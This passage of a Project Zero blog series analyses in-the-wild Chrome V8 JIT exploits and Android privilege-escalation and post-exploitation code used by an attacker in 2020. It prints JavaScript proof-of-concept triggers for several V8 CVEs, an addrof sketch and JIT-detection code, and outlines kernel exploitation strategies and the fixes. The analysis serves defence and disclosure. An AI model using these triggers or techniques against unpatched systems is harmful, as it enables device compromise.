The mismatch between the number 30 and string “30” occurs in step five. The next operation is represented by the SpeculativeSafeIntegerAdd node. The typer is aware that whenever this node encounters a non-number argument, it immediately triggers deoptimization. Hence, all non-number elements of the argument type can be ignored. The unexpected integer value, which obviously doesn’t cause the deoptimization, enables us to generate an erroneous range. Eventually, the compiler eliminates the NumberLessThan node, which is supposed to protect the element access in the last line, based on the observed range.

Patch 3

Soon after we had identified the regression, the V8 team landed a patch that removed the vulnerable code branch. They also took a number of additional hardening measures, for example:

  • Extended element access hardening, which now prevents the abuse of NumberLessThan nodes.
  • Discovered and fixed a similar problem with the elimination of MaybeGrowFastElements. Under certain conditions, this node, which may resize the backing store of a given array, is placed before StoreElement to ensure the array can fit the element. Consequently, the elimination of the node could allow an attacker to write data past the end of the backing store.
  • Implemented a verifier for induction variables that validates the computed type against the more conservative regular phi typing.

Furthermore, the V8 engineers have been working on a feature that allows TurboFan to insert runtime type checks into generated code. The feature should make fuzzing for typer issues much more efficient.

Conclusion

This blog post is meant to provide insight into the complexity of type tracking in JavaScript. The number of obscure rules and constraints an engineer has to bear in mind while working on the feature almost inevitably leads to errors, and, quite often, even the slightest issue in the typer is enough to build a powerful and reliable exploit.

Also, the reader is probably familiar with the hypothesis of an enormous disparity between the state of public and private offensive security research. The fact that we’ve discovered a rather sophisticated attacker who exploited a vulnerability in a bug class that has been under the scrutiny of the wider security community for at least a couple of years suggests that there’s nevertheless a certain overlap. Moreover, we were especially pleased to see a bug collision between a VRP submission and an in-the-wild 0-day exploit.

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 3: Chrome Exploits.

In-the-Wild Series: Chrome Exploits

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

Introduction

As we continue the series on the watering hole attack discovered in early 2020, in this post we’ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.

[Timeline chart of the extracted exploits and affected browser versions]

All vulnerabilities used by the attacker are in V8, Chrome’s JavaScript engine; more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still exploited in real-world attacks against web browsers, vulnerabilities in the JIT compiler offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need for a separate issue to, for example, break ASLR. Second, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.

The bugs themselves aren’t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker’s exploit development process.

1. CVE-2017-5070

The vulnerability

This is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:

global_array = [, 1.1];

 

function trigger(local_array) {

  var temp = global_array[0];

  local_array[1] = {};

  return global_array[1];

}

 

trigger([, {}]);

trigger([, 1.1]);

 

for (var i = 0; i < 10000; i++) {

  trigger([, {}]);

}

 

print(trigger(global_array));

The first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the “shape” of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can’t point to the same object, it doesn’t invalidate the recorded map state of global_array and, consequently, eliminates the “redundant” map check in the last line of the function.

The vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.

The issue was reported to Chrome by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. The fix made the alias analyzer use the constant comparison only when both arguments are constants:

 HAliasing Query(HValue* a, HValue* b) {

  [...]

     // Constant objects can be distinguished statically.

-    if (a->IsConstant()) {

+    if (a->IsConstant() && b->IsConstant()) {

       return a->Equals(b) ? kMustAlias : kNoAlias;

     }

     return kMayAlias;

Exploit 1

The earliest exploit we’ve discovered targets Chrome 37-58. This is the widest version range we’ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.

The author of the exploit takes a known approach to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It “constructs” a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can’t be modified. Instead, it’s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.

The exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.
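To make the addrof direction concrete, here is a hedged sketch built on the trigger pattern shown above; the real exploit regenerates such functions with eval for every call, and the helper below is our illustration rather than the exploit's code:

global_array = [, 1.1];

function addrof_trigger(local_array, obj) {
  var temp = global_array[0];  // map check on global_array recorded here
  local_array[1] = obj;        // may transition the elements to tagged
  return global_array[1];      // "redundant" map check eliminated
}

// Train the function with non-aliasing arguments...
for (var i = 0; i < 10000; i++) {
  addrof_trigger([, {}], {});
}
// ...then pass global_array itself: the stale double-elements assumption
// makes the final read return the object's tagged pointer as a double.
var target = {};
var leaked = addrof_trigger(global_array, target);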

The author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren’t moved by the garbage collector. And, of course, the exploit runs inside a web worker.

However, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it’s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.

Exploit 2

The second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit’s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.

The general approach is similar; however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind, as it’s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and is only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is the use of a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression is translated into native code already in the constructor.

While it’s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public proof-of-concept.

2. CVE-2020-6418

The vulnerability

This is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:

'use strict';

(function() {

  var popped;

 

  function trigger(new_target) {

    function inner(new_target) {

      function constructor() {

        popped = Array.prototype.pop.call(array);

      }

      var temp = array[0];

      return Reflect.construct(constructor, arguments, new_target);

    }

 

    inner(new_target);

  }

 

  var array = new Array(0, 0, 0, 0, 0);

 

  for (var i = 0; i < 20000; i++) {

    trigger(function() { });

    array.push(0);

  }

 

  var proxy = new Proxy(Object, {

    get: () => (array[4] = 1.1, Object.prototype)

  });

 

  trigger(proxy);

  print(popped);

}());

A call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable, meaning that it doesn’t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.

Note that the attacker can’t call pop on the array directly because, for the expression array.pop(), the compiler would insert an extra map check for the property load, which would be scheduled after the proxy handler had modified the array.

This is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was reported to Chrome under the 7-day deadline. The one-line patch modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:

InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(

[...]

  InferReceiverMapsResult result = kReliableReceiverMaps;

[...]

    case IrOpcode::kJSCreate: {

      if (IsSame(receiver, effect)) {

        base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);

        if (initial_map.has_value()) {

          *maps_return = ZoneHandleSet<Map>(initial_map->object());

          return result;

        }

        // We reached the allocation of the {receiver}.

        return kNoReceiverMaps;

      }

+     result = kUnreliableReceiverMaps;  // JSCreate can have side-effect.

      break;

    }

[...]

The reader can refer to the blog post published by Exodus Intel for more details on the issue and their version of the exploit.

Exploit 1

This time there’s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.

The exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the “popped” value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.

The exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can “survive” garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private symbols, owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the “trustworthy” indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.
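A rough sketch of the idea; the symbol writes are only possible through the fakeobj-based corruption, so they are shown as pseudocode comments:

class Leaky {
  constructor() {}
}

// Normally, toString() copies exactly the substring of the script
// source delimited by the two private symbols:
Leaky.toString();  // "class Leaky {\n  constructor() {}\n}"

// After corrupting the class_start_position and class_end_position
// symbols through the fake object, the same call copies an
// attacker-chosen range with no bounds checks (pseudocode):
//   class_start_position = 0
//   class_end_position   = 0x100000
//   Leaky.toString()     // returns a chunk of raw V8 heap data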

The obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.

Finally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.

The author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn’t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.

The exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:

jit_detector[Symbol.toPrimitive] = function() {

  var stack = (new Error).stack;

  if (stack.indexOf("Number (") == -1) {

    jit_detector.is_compiled = true;

  }

};

function trigger(array, proxy) {

  if (!jit_detector.is_compiled) {

    Number(jit_detector);

  }

[...]

During compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.

The exploit was broken in Chrome 64 by the change that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.

Exploit 2

After CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, another commit landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated:

function trigger(new_target) {

  function inner(new_target) {

    popped = array.pop(

        Reflect.construct(function() { }, arguments, new_target));

  }

 

  inner(new_target);

}

By making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.

The new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn’t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.

The exploit can’t modify the class body indices directly as they’re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.

This version targets Chrome 68-72. It was broken by the commit that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.

Exploit 3 & 4

The actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That’s the only significant change made by the author.

Exploit 3 is the only one we’ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant number of numeric and string literals were updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.

The exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.

The public exploit presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn’t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the pointer compression feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.

3. CVE-2019-5782

The vulnerability

CVE-2019-5782 is an issue in TurboFan’s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.

Note that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the previous post.

In this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:

oob_index = 100000;

 

function trigger() {

  let array = [1.1, 1.1];

 

  let index = arguments.length;

  index = index - 65534;

  index = Math.max(index, 0);

   

  return array[index] = 2.2;

}

 

for (let i = 0; i < 20000; i++) {

  trigger(1,2,3);

}

 

print(trigger.apply(null, new Array(65534 + oob_index)));

Qixun Zhao used the same vulnerability in Tianfu Cup and reported it to Chrome in November 2018. The public report includes a renderer exploit. The fix, which landed in Chrome 72, simply relaxed the range of the length property.

The exploit

The discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn’t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It’s worth noting that this approach doesn’t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.
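A hedged sketch of that flow; the slot offset is illustrative and would in reality be precomputed from the linear new-space allocation order:

// corrupted is a tagged-pointer array whose length field was
// overwritten once via the vulnerability; victim is an unboxed double
// array allocated at a known relative position.
var corrupted = [{}];        // length corrupted to a huge value
var victim = [1.1, 2.2];

var ELEMENTS_SLOT = 12;      // hypothetical offset to victim's elements field

function rawContents(obj) {
  // Overwrite victim's elements pointer with obj, so that reading
  // victim's elements yields obj's raw contents as doubles.
  corrupted[ELEMENTS_SLOT] = obj;
  return [victim[0], victim[1]];
}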

Interestingly, this is the only exploit that doesn’t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.

As the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that one of the hardening patches against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with site isolation; hence, the public exploit, which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.

The public and private exploits have little in common apart from the bug itself and BCE technique, which has been commonly known since at least 2017. The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.

4. CVE-2019-13764

This more complex typer issue occurs when TurboFan doesn’t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:

for (var i = -Infinity; i < 0; i += Infinity) { [...] }

This vulnerability and exploit for Chrome 73-79 have been discussed in detail in the previous blog post. There’s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.

The comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on the stability of the new exploit, even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn’t corrupt tagged element arrays, to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object, the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.
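For example, the marker-based pointer leak might conceptually look like this; the marker value and the oob_read helper are illustrative assumptions, and element representation details are glossed over:

var MARKER = 1.032462e-308;  // a distinctive, unlikely double bit pattern
var target = {};
var holder = [MARKER, target, MARKER];

// Scan reachable memory for the two markers; the slot between them
// holds the pointer to target regardless of the exact heap layout.
for (var i = 0; i < 0x10000; i++) {
  if (oob_read(i) === MARKER && oob_read(i + 2) === MARKER) {
    var leaked_pointer = oob_read(i + 1);
    break;
  }
}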

It’s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have “revived” the exploit for CVE-2019-5782.

Conclusion

The timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.

It is no secret that exploit reliability is a priority for high-tier attackers, but our findings demonstrate the amount of resources attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor twice switched from an already high-quality 0-day to a slightly better vulnerability.

The area of JIT engine security has received great attention from the wider security community over the last few years. In 2014, when Chrome 37 came out, the exploit for CVE-2017-5070 would have been considered quite ahead of its time. In contrast, if we don’t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 4: Android Exploits.

In-the-Wild Series: Android Exploits

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mark Brand, Project Zero

A survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020

Introduction

After one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we've got through that, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array which will register it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework:

[Figure: the exploit registration functions in the .init_array]

Each of the "xyz_register" functions looks like the following, adding an entry to the global list with a probe function used to check whether the device is vulnerable to the given exploit, and to estimate likelihood of success, and an exploit function used to launch the exploit. These probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device.

[Figure: a representative "xyz_register" function]

Looking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal "name" describing the exploit, and those map very neatly to either public naming ("iovy", "cow") or CVE numbers ("0569", "0820" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.

In addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.

Of course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.

Anyway, without further ado let's take a look at the exploits they did fit in here!

Common Techniques

addr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct, this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when reading to and writing from a pipe.

Userspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

Point to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

iovy

The vulnerabilities:

CVE-2015-1805 is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.

CVE-2016-3809 is an information leak, disclosing the address of a kernel sock structure.

Strategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.

Copy/Paste: ~90%. The exploit strategy is the same as public exploit code, and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.


Additional References: KEEN Lab "Talk is Cheap, Show Me the Code".

iovy_pxn2

The vulnerabilities: Same as iovy, plus:
P0-822 is an information leak, allowing the reading of arbitrary kernel memory.

Strategy: Same as above.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is a direct copy-paste; its inner loop matches the public code verbatim.

iovy_pxn3

The vulnerabilities: Same as iovy.

Strategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either "read and writev" or "write and readv" threads to get a reusable kernel read-write.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~30%. The heap-spray technique is the same as another public exploit, but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not.

0569

The vulnerability: According to the release notes, CVE-2015-0569 is a heap overflow in Qualcomm's wireless extension IOCTLs. This appears to be where the exploit name is derived from; however, as you can see in the Qualcomm advisory, there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.

Strategy: Corrupt return address; return to userspace shellcode.

Subsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.

Additional References: KEEN Lab "Rooting every Android".

0820

The vulnerability: CVE-2016-0820, a linear data-section overflow resulting from a lack of bounds checking.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.

Copy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker - it seems most likely that this was an independent implementation written after KEEN lab's presentation and based on their description.

Additional References: KEEN Lab "Rooting every Android".

COW

The vulnerability: CVE-2016-5195, also known as DirtyCOW.

Strategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.

Subsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.

Copy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.

9568

The vulnerability: CVE-2018-9568, also known as WrongZone.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.

Copy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.

Additional References: Alibaba Security "From Zero to Root". 
Baidu Security Lab: "KARMA shows you offense and defense".

Conclusion

Nothing very interesting, which is interesting in itself!

Here is an attacker who has access to 0-day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.

It certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.

One explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a "low-value" privilege-elevation capability. Alternatively, perhaps the exploit server URLs that we had access to were specifically configured for a user they knew was using an older device that would be vulnerable to one of these exploits.

Based on all the information available, it's likely that they have more device-specific 0-day exploits. We might just not have tested with a device/firmware version that they supported for those exploits, and so inadvertently missed their more modern exploits.

About the only solid conclusion we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long after their original manufacturers have stopped supporting them.

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 5: Android Post-Exploitation.

In-the-Wild Series: Android Post-Exploitation

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Maddie Stone, Project Zero

A deep-dive into the implant used by a high-tier attacker against Android devices in 2020

Introduction

This post covers what happens once the Android device has been successfully rooted by one of the exploits described in the previous post. What’s especially notable is that while the exploit chain only used known, and some quite old, n-day exploits, the subsequent code is extremely well-engineered and thorough. This leads us to believe that the choice to use n-days is likely not due to a lack of technical expertise.

This post describes what happens post-exploitation of the exploit chain. In this post, I will refer to the different portions of the exploit chain as “stage X”. The stage numbers refer to:

  • Stage 1: Chrome renderer exploit
  • Stage 2: Android privilege escalation exploit
  • Stage 3: Post-exploitation downloader ← *described in this post!*
  • Stage 4: Implant

This post details stage 3, the code that runs post exploitation. Stage 3 is an ARM ELF file that expects to run as root. This stage 3 ELF is embedded in the stage 2 binary in the data section. Stage 3 is a downloader for stage 4.

As stated at the beginning, stage 3 is a very well-engineered piece of software. It is very thorough in its methods to hide its behavior and ensure that it is running on the correct targeted device. Stage 3 includes obfuscation, many anti-analysis checks, detailed logging, command and control (C2) server communications, and ultimately, the downloading and executing of stage 4. Based on the size and modularity of the code, it seems likely that it was developed by a team rather than a single individual.

So let’s get into the fun!

Execution

Once stage 2 has successfully rooted the device and modified different security settings, it loads stage 3. Stage 3 is embedded in the data section of stage 2 and is 0x436C bytes in size. Stage 2 includes a variety of different methods to load the stage 3 ELF, including writing it to /proc/self/mem. Once one of these methods succeeds, execution transfers to stage 3.

This stage 3 ELF exports two functions: init and d. init is the function called by stage 2 to begin execution of stage 3. However, the main functionality for this binary is not in this function. Instead, it is in two functions that are referenced by the ELF's .init_array. The first function ensures that the environment variables PATH, ANDROID_DATA, and ANDROID_ROOT are set to expected values. The second function spawns a new thread that does the heavy lifting of the binary's behavior. The init function simply calls pthread_join on the thread spawned by the second function in the .init_array, so it waits for that thread to terminate.

The newly spawned thread first cleans up from the previous stage by deleting most of the environment variables that stage 2 set. It then kills any processes that include the word “knox” in their cmdline. Knox is a security platform built into Samsung devices.

Next, the code checks how often the binary has been run by reading a file, called state.parcel, that it drops on the device. Execution proceeds normally as long as the binary hasn't been run more than 6 times on the current day. In other cases, execution changes as described in the state.parcel file section.

